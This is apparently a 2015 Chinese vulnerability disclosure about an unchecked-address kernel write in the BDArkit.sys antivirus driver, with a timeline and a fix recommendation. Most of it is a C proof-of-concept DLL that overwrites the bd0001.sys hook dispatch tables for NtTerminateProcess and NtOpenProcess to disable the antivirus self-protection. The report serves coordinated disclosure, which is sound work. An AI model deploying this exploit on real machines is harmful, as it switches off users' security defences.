2015-04-02: 细节已通知厂商并且等待厂商处理中 2015-04-03: 厂商已经确认,细节仅向厂商公开 2015-04-06: 细节向第三方安全合作伙伴开放 2015-05-28: 细节向核心白帽子及相关领域专家公开 2015-06-07: 细节向普通白帽子公开 2015-06-17: 细节向实习白帽子公开 2015-07-02: 细节向公众公开
BDArkit.sys未检查DeviceIoControl传入地址的有效性,如果传入内核空间地址,可以造成任意地址写。
BDArkit.sys在IoControlCode=0x222028时,未检查传入地址的有效性,如果传入内核空间地址,可以造成任意地址写。如果传入bd0001.sys模块内保存的函数分发表地址,可造成驱动防御功能失效。
DWORD GetDriverBase(CHAR* pName){ typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Reserved [2]; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT Unknown; USHORT LoadCount; USHORT ModuleNameOffset; CHAR ImageName [256 ]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; typedef LONG (WINAPI* FN_ZwQuerySystemInformation)(ULONG, PVOID, ULONG, PULONG); FN_ZwQuerySystemInformation fn = (FN_ZwQuerySystemInformation)GetProcAddress(GetModuleHandle(_T("ntdll")), "ZwQuerySystemInformation"); if(!fn) return 0; DWORD dwBase = 0; CHAR* pBuffer = new CHAR[0x10000]; memset(pBuffer, 0, 0x10000); ULONG cb = 0; LONG l = (*fn)(11, pBuffer, 0x10000, &cb); if(0 == l) { ULONG count = *((ULONG*)pBuffer); PSYSTEM_MODULE_INFORMATION pInfo = (PSYSTEM_MODULE_INFORMATION)(pBuffer + sizeof(ULONG)); for (ULONG i = 0; i < count; ++i) { if('\0' != pInfo[i].ImageName[0]) { strlwr(pInfo[i].ImageName); if(pName && strstr(pInfo[i].ImageName, pName)) { dwBase = (DWORD)pInfo[i].Base; break; } } } } delete pBuffer; return dwBase;}void Fuzz2(HANDLE hDev){ DWORD bd0001Base = GetDriverBase("bd0001.sys"); if(!bd0001Base) return; DWORD code = 0x222028; char inputBuff[0x1000] = { 0 }; DWORD inputLen = 0xfc4; DWORD dwReturned = 0; DWORD a[] = {0x0000000a,0xfc4}; for(DWORD i = 0; i < sizeof(a)/sizeof(*a); ++i) { *((DWORD*)(inputBuff + 4*i)) = a[i]; } DeviceIoControl(hDev, code, (LPVOID)inputBuff, inputLen, (LPVOID)(bd0001Base + 0x14e80), // NtTerminateProcess的Hook函数分发表 0, &dwReturned, NULL); DeviceIoControl(hDev, code, (LPVOID)inputBuff, inputLen, (LPVOID)(bd0001Base + 0x132a8), // NtOpenProcess的Hook函数分发表 0, &dwReturned, NULL);}void Fuzz1(){ LPCTSTR DevName = _T("\\\\.\\BDArKit"); HANDLE hDev = CreateFile(DevName, GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if(INVALID_HANDLE_VALUE != hDev) { Fuzz2(hDev); CloseHandle(hDev); }}BOOL DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ){ Fuzz1(); return TRUE;}
增加对DeviceIoControl输入输出参数的检验。
危害等级:高
漏洞Rank:20
确认时间:2015-04-03 16:18
感谢提交
暂无